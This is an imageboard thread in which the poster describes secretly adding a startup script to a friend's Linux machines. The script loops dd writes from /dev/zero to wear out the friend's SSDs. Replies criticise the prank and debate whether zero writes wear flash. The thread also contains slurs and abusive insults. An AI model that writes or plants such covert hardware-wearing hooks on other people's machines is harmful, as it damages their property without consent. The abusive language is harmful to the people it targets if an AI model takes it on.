>friend is a consumerist whore despite using linux (which I got him into)
>constantly praises inane consumerist technology for no reason besides post-purchase rationalization
>one argument, he refuses to believe ssds are in any way inferior to hdds (he's replaced all hdds with ssds, even for storage)
>ignores the fact that flash storage will leak electrons after a period, unlike magnetic storage
>says "I'll have a new computer anyway by the time they wear out"
>happens to have no concept of security, leaves his computers logged in when away
>the shit DE he uses on both desktop and laptop (Xfce) allows you to set startup scripts without root password
>I add this script to his startup programs on both his machines:
[[ -e $path ]] && {
while true
dd if=/dev/zero of="$path" bs=1M count=10 oflag=dsync status=none
sleep "$(bc
Friend is a consumerist whore despite using linux (which I got him into)
Other urls found in this thread:
desu i was on your side up until i read you intentionally fucked with your friend to prove your point
maybe im just drunk but thats not cool man
if he got a "friend" like you, he doesn't need enemies
mfw this is why I no longer have friends
>dd if=/dev/zero
You realize that you'll have to write from urandom to make the SSD actually write over those cells and not just mark them as empty, right? Sounds like you're the fucking retard here.
Posted from my Dell Precision 7710 with my Samsung Pro 950 2 TB SSD. This laptop will last longer than you will, but I'll get a new one later because I have a job.
Is this how autism works?
Because someone does something you don't agree with you decide to fuck him over instead of telling him?
Wow you are a horrible friend
This is exactly the sort of crippling autism and sociopathy that I expect from Sup Forums neckbears
>thinks it's autism
no that's how cultural marxism works and OP is clearly indoctrinated. ask Sup Forums for further information on this subject.
It's a harmless prank, you idiots. If anything, he's in the wrong for not securing his workstations. This has nothing to do with "trust" or "betrayal"; if my intentions were malicious, I would have copied over his home directory while I was at it, which would include browsing history, etc. Obviously I would never do that. Get a gripe, Christ.
>You realize that you'll have to write from urandom to make the SSD actually write over those cells
Got a source? If I check SMART for 241 Total_LBAs_Written it increases even when writing zeros.
>he takes Sup Forums seriously
ayyy lmao, even after all this time or are you new?
you must have a huge chip on your shoulder about something
quit bein a fag
OP, I think you need to learn about the magic of friendship
Most operating systems that are programmed properly will use TRIM to reduce wear. If you write a block full of zeros it will just mark the block as free using TRIM.
Drumpfkins BTFO!! xDDDD amirite??
but cultural marxism is real user, it's one of the things I think of when people say "Sup Forums was right".
>everybody that doesn't like me is a liberal
>everybody I don't like is a racist sexist
people who take any side seriously is a retarded and should kill himself.
Die you fucking Barneyfag
Right about what, exactly?
Somebody's mad.
Hey Lee. I was wondering when you'd show up.
>If you write a block full of zeros it will just mark the block as free using TRIM
But it's writing to a file on the filesystem, and a file can't be marked as "unused", can it? And as well as the zeroes, the filsystem itself is written to to update the inode